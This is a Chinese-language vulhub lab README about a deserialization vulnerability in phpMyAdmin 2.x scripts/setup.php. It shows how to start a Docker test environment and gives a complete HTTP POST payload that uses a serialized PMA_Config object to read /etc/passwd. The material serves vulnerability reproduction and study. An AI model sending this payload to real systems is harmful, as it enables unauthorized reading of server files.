Files
vulhub/phpmyadmin/WooYun-2016-199433/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
first commit
2025-09-06 16:08:15 +08:00

34 lines
959 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# phpmyadmin scripts/setup.php 反序列化漏洞WooYun-2016-199433
phpmyadmin 2.x版本中存在一处反序列化漏洞通过该漏洞攻击者可以读取任意文件或执行任意代码。
## 环境搭建
执行如下命令启动phpmyadmin
```
docker compose up -d
```
环境启动后,访问`http://your-ip:8080`即可看到phpmyadmin的首页。因为没有连接数据库所以此时会报错但我们这个漏洞的利用与数据库无关所以忽略。
## 漏洞复现
发送如下数据包,即可读取`/etc/passwd`
```
POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
```
![](1.png)